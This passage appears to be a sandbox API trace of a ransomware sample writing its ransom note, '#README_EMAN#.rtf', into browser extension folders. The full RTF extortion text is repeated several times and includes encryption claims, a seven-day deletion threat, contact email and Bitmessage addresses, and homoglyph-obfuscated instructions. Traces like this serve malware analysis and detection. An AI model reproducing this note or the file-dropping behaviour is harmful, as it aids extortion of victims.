}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.176] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.177] CloseHandle (hObject=0x294) returned 1 [0278.177] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0278.177] GetLastError () returned 0x2 [0278.177] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 